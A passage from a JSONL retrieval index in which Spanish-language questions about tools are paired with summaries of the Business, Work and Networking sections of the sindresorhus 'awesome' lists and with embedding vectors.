-0.12024, -0.03019, -0.13095, -0.05981, 0.20512, 0.00245, 0.0206, -0.0265, 0.05371, 0.09536, -0.10946, -0.01431, -0.00762, -0.06774, 0.00338, -0.07446, 0.15239, -0.1251, 0.01947, -0.17722, -0.07341, -0.04347, -0.04969, 0.01078, 0.00832, 0.02668, -0.06853, -0.07479, -0.02899, -0.06897, 0.00277, -0.01775, 0.03916, -0.02139, -0.01986, 0.06608, 0.11354, 0.18164, -0.02714, -0.06094, 0.0499, -0.00048, -0.14164, -0.01779, -0.02557, -0.07404, 0.03848, 0.07092, 0.00271, -0.08599, -0.02932, -0.0479, -0.0608, -0.05586, 0.03711, 0.03608, 0.12568, -0.06691, 0.04036, -0.0178, 0.09379, -0.08341, -0.06822, 0.08317, -0.01411, 0.10222, 0.01978, -0.03774, -0.02481, -0.02117, -0.0564, -0.00055, 0.00378, 0.04678, -0.04145, 0.03879, 0.03135, -0.02447, -0.04, 0.02248, -0.02426, -0.00189, 0.06199, -0.00193, 0.05125, -0.07579, 0.01639, 0.04234, 0.00173, -0.06505, -0.00784, 0.02345, -0.08181, 0.08479, -0.05697, 0.02171, 0.01629, -0.13168, -0.10306, -0.03576, -0.06825, 0.14076, -0.07989, -0.08693, 0.00545, -0.00965, 0.08891, -0.13606, 0.05322, 0.02462, 0.05744, -0.04001, -0.03083, 0.08629, -0.06854, 0.02342, 0.00367, 0.00813, -0.13171, 0.1089, -0.03545, -0.04474, -0.00165, 0.05265, 0.02877, -0.01423, -0.00296, 0.02277, 0.05657, 0.01863, 0.00696, -0.00132, 0.04643, 0.0185, -0.0272, -0.01312, -0.028, -0.02154, -0.00447, -0.06425, -0.01838, -0.04059, 0.00531, 0.00244, 0.02314, -0.02533, -0.01545, -0.00669, 0.02541, 0.0397, -0.01172, -0.03002, -0.0138, 0.03058, 0.01942, -0.00105, 0.01812, 0.00629, 0.01263, -0.01501, -0.00749, 0.00212, 0.01111, -0.00801, -0.04104, 0.05928, 0.02518, -0.03662, -0.01765, 0.01996, 0.03687, -0.05488, -0.03084, -0.02845, -0.03411, -0.04368, 0.01713, 0.02864, 0.00789, 0.02933, 0.03557, -0.01492, 0.01832, -0.01013, -0.02063, -0.00079, 0.02308, 0.01033, -0.01246, -0.03762, -0.00807, 0.00589, 0.00396, 0.06404, 0.02317, -0.03525, 0.05526, -0.02933, -0.04776, -0.023, -0.01702, 0.01423, 0.03269, -0.02549, -0.02723, -0.02666, -0.02584, -0.04247, -0.01072, -0.04068, -0.00435, 0.01915, -0.01598, -0.0036, 0.02166, -0.01147]} -{"tipo": "pregunta", "herramienta": "Business", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Business", "tema": "business", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Business: Open Companies. Places to Post Your Startup. OKR Methodology β€” Goal setting & communication best practices. Indie β€” Independent developer businesses. Tools of the Trade β€” Tools used by companies on Hacker News. Clean Tech β€” Fighting climate change with technology. Wardley Maps β€” Provides high situational awareness to help improve strategic planning and decision making. Social Enterprise β€” Building an organization primarily focused on social impact that is at least partially self-funded. Engineering Team Management β€” How to transition from software development to engineering management. Developer-First Products β€” Products that target developers as the user. Billing β€” Payments, invoicing, pricing, accounting, marketplace, fraud, and business intelligence. Engineering Strategy β€” How to design and execute engineering strategies for tech leadership.", "indexar": "con que puedo montar una empresa orientada al impacto social y financiarme parcialmente sola?", "v": [0.03797, 0.12585, -0.14126, -0.05522, -0.03579, -0.05289, 0.00391, -0.08587, -0.18006, -0.1202, -0.08161, 0.00714, 0.11057, 0.02052, 0.02017, 0.07688, -0.01114, -0.21458, -0.08647, -0.0686, 0.02534, -0.08727, 0.02569, -0.05955, -0.0642, -0.01231, 0.02868, -0.09477, -0.09704, 0.0234, 0.12337, 0.04353, 0.14491, -0.0055, -0.02876, -0.02661, -0.00255, -0.00615, 0.11826, -0.07769, 0.04257, -0.0213, -0.00762, -0.02229, 0.09669, 0.08391, -0.0721, 0.04044, -0.02118, 0.08185, -0.02994, 0.02075, -0.1145, 0.05667, -0.00765, 0.05345, 0.05776, -0.03091, -0.00673, 0.0184, -0.04651, 0.09201, -0.06409, 0.06938, -0.01958, 0.05939, 0.07557, 0.02264, -0.03089, -0.0294, -0.01545, -0.1063, -0.12312, 0.01795, 0.02349, 0.03712, 0.07114, 0.11916, -0.07444, -0.05559, 0.0361, -0.05011, -0.06852, 0.15762, 0.00269, -0.09211, 0.01915, 0.00732, -0.062, -0.05644, -0.00095, -0.01465, -0.09801, -0.11699, -0.19424, -0.00995, -0.00242, -0.01025, -0.08681, -0.07329, -0.07686, -0.03101, -0.01746, -0.02594, -0.04029, 0.04592, -0.03196, -0.10132, -0.00366, -0.02664, -0.0354, 0.01458, -0.0474, -0.06266, -0.03688, -0.00933, -0.04305, 0.01316, 0.00472, -0.05307, 0.01956, -0.01599, 0.13034, -0.00552, -0.08248, -0.0307, 0.03221, 0.09905, 0.06644, -0.06682, -0.04257, 0.08679, -0.05876, -0.05435, -0.04747, 0.03042, -0.03156, -0.0326, 0.03655, -0.02523, 0.09474, 0.03828, 0.03518, -0.05807, 0.03284, 0.04499, -0.01051, -0.14924, -0.0606, 0.0616, -0.00105, 0.08274, -0.04842, 0.0538, -0.07243, 0.01313, 0.03781, 0.03446, 0.07093, 0.1456, 0.04287, 0.02526, -0.09393, -0.00375, 0.00254, -0.10239, -0.14826, -0.02452, 0.05297, -0.00943, -0.03911, 0.04938, 0.02725, 0.00892, 0.10618, -0.01413, -0.04711, -0.06039, 0.04419, 0.05842, -0.03887, 0.04036, 0.00735, -0.01018, 0.00647, -0.00023, -0.02465, 0.02767, -0.0043, 0.04424, 0.01246, 0.03108, -0.04255, 0.00228, 0.01572, -0.06781, -0.01547, -0.03046, 0.09118, 0.00182, -0.09928, -0.02379, -0.07163, -0.01989, 0.03202, 0.01075, -0.02677, 0.08426, -0.02189, 0.06879, 0.04282, -0.09674, 0.03505, -0.03562, -0.05104, -0.04359, 0.05513, -0.06992, -0.03882, 0.11424, 0.01007, 0.01373, 0.11786, 0.04821, 0.0145, 0.00813, 0.03334, -0.0147, -0.0118, 1e-05, -0.05804, 0.05559, -0.0453, -0.02566, 0.07819, 0.02034, 0.03588, -0.03803, -0.05922, 0.00104, 0.04889, 0.05513, -0.00685, 0.01386, -0.08247, -0.041, -0.07469, 0.09796, -0.0033, -0.03954, -0.02987, 0.02438, 0.04391, -0.06087, 0.05422, 0.00385]} -{"tipo": "pregunta", "herramienta": "Business", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Business", "tema": "business", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Business: Open Companies. Places to Post Your Startup. OKR Methodology β€” Goal setting & communication best practices. Indie β€” Independent developer businesses. Tools of the Trade β€” Tools used by companies on Hacker News. Clean Tech β€” Fighting climate change with technology. Wardley Maps β€” Provides high situational awareness to help improve strategic planning and decision making. Social Enterprise β€” Building an organization primarily focused on social impact that is at least partially self-funded. Engineering Team Management β€” How to transition from software development to engineering management. Developer-First Products β€” Products that target developers as the user. Billing β€” Payments, invoicing, pricing, accounting, marketplace, fraud, and business intelligence. Engineering Strategy β€” How to design and execute engineering strategies for tech leadership.", "indexar": "cual es el mejor metodo para establecer objetivos claros y comunicar resultados en mi startup?", "v": [-0.00432, 0.1527, -0.20712, -0.146, 0.06726, -0.21945, -0.08526, -0.03046, -0.17781, -0.09908, -0.11613, -0.07364, 0.00642, -0.03504, 0.09388, 0.03653, 0.07718, -0.03983, -0.0223, -0.05279, -0.05897, -0.11514, -0.07744, -0.0439, -0.09699, -0.08555, -0.00572, -0.06508, -0.06553, 0.01409, 0.0407, 0.07706, 0.06437, -0.04534, -0.00349, -0.08549, -0.08754, 0.10748, -0.0914, 0.0456, -0.11725, -0.05467, 0.04617, 0.077, 0.12199, -0.06049, -0.02141, -0.01037, -0.05209, 0.01898, 0.02994, 0.00373, -0.07919, -0.05751, -0.0825, 0.05346, 0.06626, -0.02917, -0.00081, -0.13662, -0.02455, -0.03857, -0.03137, 0.01109, 0.04639, -0.00437, 0.03151, -0.04619, -0.12803, 0.154, 0.1108, 0.04345, -0.08159, -0.02643, 0.15671, 0.10485, -0.0304, -0.0176, 0.1001, -0.04883, -0.02063, -0.1099, -0.12638, 0.08525, -0.09616, -0.0742, 0.00753, 0.02913, -0.00784, -0.06835, -0.09771, 0.00159, 0.0044, -0.02613, -0.03615, -0.05563, 0.07304, -0.00314, -0.07321, 0.05842, -0.06454, -0.04386, -0.124, 0.05591, -0.03383, -0.02231, -0.00456, -0.01331, -0.03616, 0.00662, -0.03698, -0.06674, 0.02825, 0.00716, -0.01786, -0.13295, 0.0299, -0.01401, -0.07147, -0.0583, -0.12424, 0.02228, -0.00767, 0.01003, 0.00107, 0.01099, 0.03018, 0.01156, 0.10816, 0.11812, 0.04081, 0.03224, -0.02062, 0.03721, -0.00746, 0.05919, 0.07642, -0.01274, 0.01585, 0.00689, -0.02113, -0.06831, -0.00248, -0.09408, 0.01855, -0.00157, 0.01068, -0.09199, -0.01428, 0.06737, -0.04879, 0.00353, -0.05909, -0.01184, -0.10441, 0.01448, -0.02828, -0.07118, 0.0324, 0.08598, -0.02252, -0.00111, -0.00873, 0.00946, 0.07271, -0.05712, -0.03832, -0.01705, 0.07112, -0.00206, -0.01593, 0.01961, -0.02814, -0.03613, -0.00506, -0.0233, -0.0393, -0.02986, -0.01437, -0.08507, -0.02972, 0.07289, 0.0179, -0.01544, 0.0745, -0.01811, -0.01822, -0.00233, -0.03427, 0.0343, 0.04216, -0.01848, -0.01872, -0.09996, 0.02483, -0.05823, -0.03176, -0.06278, 0.04611, 0.05075, -0.08436, 0.00707, -0.00257, 0.00748, -0.01703, 0.02403, -0.04599, -0.06714, 0.00529, 0.06833, 0.03585, -0.00925, 0.08812, -0.02593, -0.12128, 0.05033, -0.01123, -0.04646, -0.02973, 0.09914, 0.02693, 0.05309, -0.01205, -0.08766, -0.04326, 0.04171, 0.02186, 0.00596, -0.00567, -0.00208, -0.0727, 0.02006, -0.03131, -0.02322, 0.05434, 0.03245, 0.03444, -0.06092, -0.04414, -0.03539, 0.03871, 0.04051, 0.05595, -0.0164, 0.00273, 0.00187, -0.08963, 0.03854, -0.02569, -0.06449, -0.01357, 0.02473, 0.06308, -0.00855, 0.04576, -0.03994]} -{"tipo": "pregunta", "herramienta": "Work", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Work", "tema": "work", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Work: Slack β€” Team collaboration. Communities. Remote Jobs. Productivity. Niche Job Boards. Programming Interviews. Code Review β€” Reviewing code. Creative Technology β€” Businesses & groups that specialize in combining computing, design, art, and user experience.", "indexar": "que programa sirve para revisar el cΓ³digo de un equipo?", "v": [-0.05725, -0.06046, -0.15574, -0.18271, 0.03151, -0.28485, -0.00906, 0.00881, -0.00271, -0.19869, -0.0147, -0.15811, 0.02351, -0.11964, 0.07392, 0.00308, 0.14722, -0.00113, 0.13321, 0.02209, 0.06922, -0.05818, -0.03293, -0.06185, 0.02947, 0.06485, 0.00241, 0.02571, -0.0638, -0.06637, -0.00189, -0.00923, 0.10103, -0.06375, -0.02812, 0.08235, 0.15934, 0.08419, -0.02097, 0.11208, -0.00681, 0.04969, -0.07302, -0.01031, 0.06373, -0.04082, 0.11865, 0.103, 0.01192, -0.01596, -0.03968, 0.03148, 0.00874, -0.05672, -0.01206, -0.07688, -0.02332, -0.12424, -0.14277, -0.03243, 0.0465, -0.15063, 0.04851, -0.10721, -0.0086, 0.02486, 0.02309, 0.04344, -0.0532, -0.02155, -0.06066, 0.03815, -0.02722, -0.08217, -0.09152, -0.01715, 0.0273, -0.03377, 0.04505, -0.03047, 0.00533, 0.06771, -0.03799, 0.03415, -0.01484, -0.02507, 0.00738, 0.00229, 0.01072, -0.09246, 0.04797, 0.03686, -0.0192, 0.03881, 0.02751, 0.06818, 0.14822, 0.03259, 0.07548, 0.07231, 0.08845, -0.1109, 0.03471, 0.0612, 0.04634, 0.12977, 0.11429, 0.0171, -0.02746, 0.06299, -0.00024, -0.09189, -0.14155, -0.0104, -0.06559, -0.02511, -0.07556, -0.013, 0.02572, -0.05067, -0.0751, 0.04775, -0.10311, 0.04804, 0.04503, 0.03206, 0.05756, 0.05129, 0.00813, 0.05493, -0.06289, 0.01849, -0.03729, 0.07757, -0.09634, -0.04807, 0.0418, 0.02436, -0.01101, 0.0627, -0.00653, 0.08707, 0.06196, 0.14331, 0.01151, 0.00764, 0.01031, -0.05776, -0.03515, 0.0372, 0.01924, 0.06894, -0.06213, 0.04094, -0.08263, 0.01197, 0.02049, 0.02268, -0.09482, -0.0179, -0.10203, -0.06196, -0.00535, -0.0518, 0.05679, -0.04498, 0.0412, 0.0096, 0.10357, 0.03559, 0.00156, -0.03256, 0.09437, -0.09532, -0.00785, 0.03872, 0.02673, -0.03526, -0.03113, 0.00846, -0.0608, 0.04021, 0.07242, -0.00309, 1e-05, 0.00459, -0.04509, 0.0685, -0.00326, -0.04335, -0.01505, 0.02113, 0.03214, -0.01004, -0.00801, 0.0263, -0.0148, 0.0133, -0.00758, -0.08528, -0.0208, 0.07328, 0.02551, 0.00978, 0.01218, 0.06274, -0.01061, -0.01939, 0.01303, 0.09986, 0.00934, -0.02924, 0.03975, 0.04828, -0.03742, -0.05144, -0.03351, 0.08108, 0.08712, 0.06303, 0.01797, -0.03867, -0.00627, 0.02988, 0.01884, -0.0635, -0.01596, 0.03548, -0.0134, -0.0235, 0.01514, -0.02429, 0.01117, 0.03066, 0.01493, -0.01169, -0.02668, 0.00831, -0.02091, -0.08562, -0.02661, 0.03398, -0.051, -0.0396, 0.00524, 0.04339, -0.01935, -0.06438, -0.00699, 0.02264, -0.02807, 0.00791, 0.00851, -0.06097, 0.03326, 0.0382]} -{"tipo": "pregunta", "herramienta": "Work", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Work", "tema": "work", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Work: Slack β€” Team collaboration. Communities. Remote Jobs. Productivity. Niche Job Boards. Programming Interviews. Code Review β€” Reviewing code. Creative Technology β€” Businesses & groups that specialize in combining computing, design, art, and user experience.", "indexar": "con que puedo montar comunidades de trabajo remoto?", "v": [0.09068, 0.03903, -0.14802, -0.18769, -0.16194, -0.04746, 0.08843, 0.21786, -0.16979, -0.10719, -0.12903, -0.03078, 0.13268, 0.00693, 0.10854, 0.11096, 0.10942, 0.04121, 0.00859, 0.0076, 0.04246, -0.10222, 0.06748, 0.04887, -0.00025, -0.03519, 0.10419, -0.07672, -0.0278, 0.04199, 0.12468, 0.10755, -0.00271, 0.04208, 0.0038, -0.08708, -0.02946, 0.0397, -0.05301, -0.08329, -0.00408, -0.05428, -0.1184, -0.07332, -0.03126, 0.04747, -0.01177, -0.15332, -0.03325, 0.04997, -0.04417, 0.00907, -0.01325, -0.08653, -0.05096, 0.0402, 0.19847, -0.01718, 0.00038, 0.01842, -0.08787, 0.10491, -0.04178, -0.00896, 0.08396, -0.06935, -0.04711, 0.01006, -0.07166, 0.0836, -0.06753, -0.06969, -0.01085, -0.08149, -0.05633, -0.05097, -0.0584, -0.04063, -0.00046, -0.04381, -0.02719, 0.02413, 0.05682, 0.00266, -0.12962, -0.09222, -0.03841, -0.11317, 0.06033, -0.07478, 0.05822, 0.02235, 0.06325, -0.08456, 0.01874, 0.02957, 0.01697, 0.04215, -0.04061, -0.01048, -0.07146, 0.02745, 0.01948, 0.0308, 0.06113, 0.03492, 0.1061, 0.05234, 0.00619, 0.00248, 0.03283, 0.04271, -0.02408, -0.02286, -0.06985, -0.09295, -0.07598, 0.04203, 0.05119, -0.02507, -0.00964, 0.02992, 0.09161, 0.02769, 0.08606, -0.08993, 0.10914, 0.05755, -0.00616, 0.05087, -0.03425, 0.06046, -0.05355, -0.04799, -0.02769, 0.05727, -0.00383, -0.08993, -0.01614, -0.06298, 0.03261, -0.00841, 0.03153, -0.05821, 0.05458, 0.07351, -0.00392, -0.09612, 0.02738, -0.05168, 0.05981, 0.07204, 0.04685, -0.05296, -0.04128, -0.05864, 0.06678, -0.00204, 0.06076, 0.03002, 0.08395, 0.00509, -0.00678, -0.03108, -0.02321, 0.02139, -0.01229, -0.05877, 0.09367, 0.0335, -0.06243, 0.00732, 0.13016, -0.03412, 0.08543, 0.01522, -0.01903, 0.00164, 0.00462, 0.04152, -0.06814, 0.04943, -0.02874, -0.03219, 0.10912, 0.09235, -0.00093, 0.02379, 0.00365, 0.07253, 0.00983, -0.04398, 0.04388, 0.03542, 0.06001, -0.0933, 0.01618, -0.005, -0.04282, 0.02838, -0.00974, -0.05727, -0.00652, -0.01061, -0.01738, -0.00487, -0.01386, 0.08568, -0.00358, 0.09765, 0.07019, -0.04939, 0.02722, -0.00522, -0.02217, -0.00295, 0.03649, -0.08422, -0.02947, 0.05763, -0.01, 0.04936, 0.06666, -0.04117, 0.06912, 0.00362, 0.03561, 3e-05, 0.02141, -0.07118, 0.07619, 0.03149, -0.04027, -0.01889, 0.01787, 0.02121, 0.02394, 0.01303, -0.00307, 0.02834, 0.02217, 0.02793, -0.01902, -0.03136, -0.08065, -0.00887, -0.07082, 0.03991, -0.04546, -0.06148, -0.06814, 0.02012, -0.01738, -0.03996, 0.02184, -0.00382]} -{"tipo": "pregunta", "herramienta": "Work", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Work", "tema": "work", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Work: Slack β€” Team collaboration. Communities. Remote Jobs. Productivity. Niche Job Boards. Programming Interviews. Code Review β€” Reviewing code. Creative Technology β€” Businesses & groups that specialize in combining computing, design, art, and user experience.", "indexar": "cual es una herramienta para negocios que mezclan diseΓ±o y tecnologΓ­a?", "v": [0.00595, 0.04123, -0.07076, -0.2425, 0.04422, -0.12239, -0.12971, -0.00095, -0.03325, -0.09626, -0.08751, -0.09962, -0.067, -0.04563, 0.00243, 0.00163, 0.11051, -0.17444, 0.02851, -0.01728, 0.01456, -0.00582, -0.12888, -0.09065, -0.08588, -0.06702, 0.00643, -0.09831, -0.27782, 0.16713, 0.01709, -0.06228, 0.05834, -0.02821, -0.13974, -0.12582, 0.02097, 0.05668, 0.02242, 0.01917, -0.04758, -0.06347, -0.09356, 0.08701, 0.09988, 0.06268, 0.01475, 0.05868, -0.0484, 0.08457, -0.09925, -0.02326, -0.07468, 0.05553, 0.11186, -0.08011, 0.12743, -0.07233, 0.06278, -0.0515, -0.04537, -0.06628, -0.07566, -0.05927, -0.03183, -0.01973, -0.06767, -0.12627, -0.01917, 0.00125, 0.03822, -0.01921, 0.00048, -0.13132, 0.05715, 0.0369, 0.01968, 0.06426, 0.01337, -0.01793, 0.01931, -0.04263, -0.12113, -0.01214, -0.03951, -0.08563, 0.05328, 0.04021, -0.01048, -0.01944, -0.00196, 0.08087, -0.05833, -0.08844, 0.04349, -0.0201, 0.09528, -0.03188, -0.00704, 0.10484, 0.08391, -0.02834, -0.15691, 0.01337, -0.02601, 0.00935, -0.01955, -0.03899, -0.06324, -0.0419, -0.03807, 0.05244, 0.01847, -0.00516, -0.08594, 0.01851, 0.01181, -0.06107, -0.09417, -0.06383, -0.05262, -0.00171, -0.06713, -0.0472, 0.05133, 0.00542, -0.05927, 0.0544, -0.0114, -0.0808, -0.00631, -0.05044, -0.08551, 0.03143, 0.02285, 0.03777, -0.01257, -0.08011, 0.03612, -0.06956, 0.08056, 0.04951, -0.04608, -0.06496, 0.00913, 0.01622, 0.08611, -0.06831, -0.10659, 0.0212, -0.00589, 0.03742, -0.03419, 0.00837, -0.12474, 0.0217, -0.05395, 0.02692, -0.04444, 0.06158, -0.03127, 0.03446, 0.04405, -0.00449, 0.01969, -0.06325, -0.02391, -0.01693, 0.06062, 0.03819, -0.02932, -0.01985, 0.02614, -0.00089, -0.0346, -0.04505, -0.10783, 0.00168, -0.00901, -0.09585, -0.09329, 0.01606, -0.07604, 0.02711, 0.04469, -0.05438, 0.0077, 0.03743, -0.0011, 0.00302, -0.0109, 0.03068, 0.00649, -0.03655, 0.0145, -0.01211, 0.05004, -0.04287, -0.00827, -0.0191, -0.07058, -0.05296, -0.06203, -0.0629, -0.02688, 0.06882, -0.05283, -0.02278, -0.00918, 0.03778, 0.01653, -0.06484, 0.01703, 0.01195, -0.05485, -0.03404, -0.00933, -0.03877, -0.01699, 0.01472, 0.04116, -0.01273, 0.00351, 0.01688, 0.01089, 0.03916, 0.03978, 0.02343, -0.03771, -0.08865, -0.02771, -0.01421, -0.02513, 0.00687, 0.01653, 0.00838, 0.04567, -0.01238, -0.08111, -0.05029, 0.01876, 0.0484, -0.01692, -0.03754, -0.02882, -0.03274, -0.08753, -0.01167, -0.08344, -0.0972, -0.00034, 0.05076, 0.03088, -0.0803, 0.05241, 0.0199]} -{"tipo": "pregunta", "herramienta": "Networking", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Networking", "tema": "networking", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Networking: Software-Defined Networking. PCAPTools. Real-Time Communications β€” Network protocols for near simultaneous exchange of media and data. SNMP β€” A protocol for collecting, modifying, and organizing information about managed devices on IP networks. Scapy β€” Python-based interactive packet manipulation. Cilium β€” Provides networking and security capabilities for containerized apps, microservices, and virtual machines.", "indexar": "que programa me sirve para manipular paquetes de red interactivamente", "v": [0.25777, 0.05414, -0.12419, -0.20198, 0.04659, -0.07511, -0.02172, 0.03426, -0.04223, -0.13629, 0.01532, -0.07399, 0.05536, -0.12182, 0.0278, 0.08746, -0.00809, -0.02902, 0.13503, -0.00597, 0.12816, 0.02964, -0.12264, -0.1437, 0.02289, 0.09465, 0.08864, -0.05776, -0.01309, 0.04877, -0.05324, -0.01328, -0.01414, -0.10029, -0.06598, -0.015, 0.05402, -0.01568, 0.09778, 0.03277, -0.01225, 0.01018, -0.08355, 0.02436, 0.07135, 0.10593, 0.06397, -0.05203, -0.0175, 0.05581, -0.00541, -0.05002, -0.12151, -0.02397, -0.01189, -0.10428, 0.04128, -0.17171, -0.11754, -0.0137, 0.07207, -0.00949, 0.01605, -0.05758, 0.1243, 0.00356, 0.02279, -0.08415, -0.04211, 0.10876, 0.02368, 0.03718, 0.10806, 0.01152, -0.03903, 0.00519, -0.01282, -0.10032, 0.01361, 0.04052, -0.06345, 0.06779, 0.04319, 0.10476, 0.03172, -0.05254, 0.04938, -0.13211, 0.01745, -0.11368, 0.04976, 0.00738, 0.04996, -0.00149, 0.10816, -0.02023, 0.06277, -0.0265, 0.06172, 0.03385, 0.07873, 0.01416, -0.13885, -0.004, -0.01681, 0.0933, 0.07444, 0.04076, 0.05266, 0.04592, 0.06109, -0.01794, 0.07127, -0.05327, -0.04914, 0.05451, 0.03546, 0.02843, 0.0134, -0.05788, -0.08372, 0.03367, -0.07484, 0.00417, 0.13139, -0.03777, 0.00866, 0.02073, -0.07499, 0.02519, -0.09446, 0.004, 0.04724, -0.08971, -0.01477, -0.18386, 0.0116, -0.13051, 0.01465, -0.00216, 0.03829, 0.09999, -0.02789, -0.02562, -0.03425, 0.07836, 0.10024, 0.03241, 0.04756, 0.07243, 0.03509, -0.06273, 0.02077, 0.01076, 0.01156, -0.01433, 0.04597, -0.02284, -0.0927, 0.05311, -0.07875, -0.05305, -0.00693, -0.00249, -0.00407, -0.01633, -0.06342, -0.01339, 0.06605, 0.05814, -0.0494, 0.04336, 0.0569, 0.00496, -0.06225, -0.05597, -0.03981, -0.03904, 0.01772, -0.07558, 0.01627, 0.04107, 0.07207, 0.00186, -0.05255, -0.04241, -0.06228, -0.00627, 0.01091, -0.01377, 0.00814, 0.0082, 0.01183, -0.02275, 0.03956, 0.02406, 0.00475, 0.03144, 0.01742, 0.00323, 0.02639, -0.00025, 0.03037, 0.03632, -0.01155, 0.11827, 0.0367, -0.00856, 0.07893, 0.1144, 0.01449, 0.02572, 0.05731, 0.03595, -0.04704, -0.02642, 0.01357, 0.0242, 0.04625, 0.06337, 0.01587, -0.0568, -0.02857, 0.01969, -0.07218, -0.0354, -0.0117, 0.05129, 0.02977, -0.00236, 0.05157, -0.07682, 0.03697, 0.03188, -0.04257, -0.05509, 0.04567, 0.04035, -0.01545, -0.06971, -0.03696, 0.05094, -0.03094, -0.04523, 0.02113, -0.04725, -0.0442, -0.01468, 0.00345, 0.00681, -0.08669, 0.02427, -0.01133, -0.04796, 0.0153, -0.01702]} -{"tipo": "pregunta", "herramienta": "Networking", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Networking", "tema": "networking", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Networking: Software-Defined Networking. PCAPTools. Real-Time Communications β€” Network protocols for near simultaneous exchange of media and data. SNMP β€” A protocol for collecting, modifying, and organizing information about managed devices on IP networks. Scapy β€” Python-based interactive packet manipulation. Cilium β€” Provides networking and security capabilities for containerized apps, microservices, and virtual machines.", "indexar": "cual es una herramienta para configurar protocolos de comunicaciΓ³n en tiempo real", "v": [0.05, 0.12276, -0.07975, -0.22764, 0.06586, -0.26801, 0.0522, 0.02733, -0.07185, -0.00955, -0.08488, -0.03456, 0.03517, -0.08158, 0.02991, 0.05442, 0.11918, -0.07119, 0.0608, -0.00876, -0.05265, -0.01408, -0.12504, 0.03516, 0.01335, -0.07807, 0.09434, -0.04885, -0.08791, 0.03993, 0.0159, 0.00212, 0.07909, -0.00215, -0.10327, 0.02183, 0.03131, 0.14311, -0.03778, 0.0646, -0.04029, -0.06366, -0.03392, 0.0801, 0.09733, -0.02065, -0.04747, -0.04882, 0.04672, -0.00588, -0.08175, -0.04586, -0.0796, 0.06353, -0.06421, -0.09166, 0.24026, -0.15173, -0.02953, -0.13343, -0.0286, -0.04778, 0.01227, -0.01128, 0.04637, 0.00608, 0.00085, -0.08071, -0.1389, 0.03648, 0.01982, -0.03633, -0.02309, 0.01581, 0.12136, -0.01113, -0.04714, 0.05027, 0.0824, 0.00158, 0.08567, -0.00405, 0.00188, 0.11958, -0.11243, -0.0136, 0.06297, -0.06035, -0.02662, -0.05616, -0.06563, 0.05689, -0.06392, -0.05532, 0.12926, -0.0299, 0.00947, -0.06995, -0.01199, 0.03017, 0.05726, 0.01837, -0.1729, 0.02293, -0.02555, 0.01211, -0.02269, -0.05154, 0.01067, -0.07712, 0.00646, 0.00979, 0.05089, -0.00767, -0.00621, 0.04418, 0.04111, -0.1035, -0.02847, -0.07597, -0.03681, 0.06734, -0.08007, 0.02071, -0.00935, 0.06009, -0.04328, 0.0265, 0.02551, 0.01303, -0.01772, -0.13021, -0.01581, -0.03829, -0.08444, -0.03347, -0.01899, -0.03383, -0.0272, -0.11831, -0.03735, -0.02969, -0.10837, -0.07175, 0.04301, 0.03497, -0.02613, -0.07218, -0.12538, 0.06746, -0.00029, 0.01812, 0.00901, 0.00377, -0.03039, -0.0137, -0.08036, 0.03779, -0.11407, 0.03003, -0.07447, -0.01181, 0.04537, -0.03166, 0.09462, -0.05569, -0.01483, 0.04589, 0.09253, 0.01445, 0.05692, -0.02594, 0.08928, -0.00589, -0.06489, 0.00923, -0.06871, -0.01043, -0.01563, -0.12251, 0.0068, 0.0251, -0.00038, -0.02832, 0.09347, -0.02168, -0.01586, 0.01082, -0.05451, 0.01933, -0.00521, -0.0074, 0.02812, 0.0266, 0.04532, -0.00836, -0.02791, -0.08087, 0.01825, 0.01117, -0.0187, -0.02595, 0.04213, -0.01424, 0.01522, 0.09779, -0.05792, -0.02511, -0.02544, 0.05775, 0.08571, -0.00398, 0.00179, -0.00729, -0.04866, -0.01739, 0.0099, -0.05497, 0.0326, -0.00347, 0.06515, -0.00216, 0.00992, -0.05875, -0.0828, 0.00792, -0.0191, 0.03356, -0.01404, -0.06254, -0.04131, 0.01325, 0.01236, 0.02175, 0.04199, -0.00846, 0.0385, -0.04297, -0.03435, -0.05123, 0.01156, 0.06769, -0.00903, 0.01226, -0.02271, -0.03299, -0.07763, -0.01123, -0.01235, -0.07589, -0.03655, 0.03183, 0.07799, -0.01801, 0.04109, -0.07003]} -{"tipo": "pregunta", "herramienta": "Networking", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Networking", "tema": "networking", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Networking: Software-Defined Networking. PCAPTools. Real-Time Communications β€” Network protocols for near simultaneous exchange of media and data. SNMP β€” A protocol for collecting, modifying, and organizing information about managed devices on IP networks. Scapy β€” Python-based interactive packet manipulation. Cilium β€” Provides networking and security capabilities for containerized apps, microservices, and virtual machines.", "indexar": "con que puedo analizar el estado de dispositivos en una red IP", "v": [-0.03912, 0.07557, -0.11904, -0.13263, 0.06831, -0.11889, -0.06433, -0.06354, -0.13759, -0.00943, 0.02244, -0.13181, -0.08958, -0.09504, 0.07271, 0.04625, -0.06337, 0.00855, 0.08846, -0.14829, 0.02526, 0.02235, -0.13783, 0.05816, 0.0497, 0.2295, -0.02061, 0.04326, -0.10615, -0.09057, -0.12433, -0.02324, -0.03425, -0.07735, -0.18702, -0.10066, -0.00084, 0.17038, -0.0685, 0.06844, -0.06054, 0.02725, 0.00127, -0.03281, 0.07782, 0.04336, -0.0527, -0.10475, -0.05837, -0.00855, -0.09898, -0.05815, -0.09703, -0.0332, -0.08475, 0.04175, 0.0276, -0.03774, 0.08081, 0.0178, -0.04976, 0.01487, 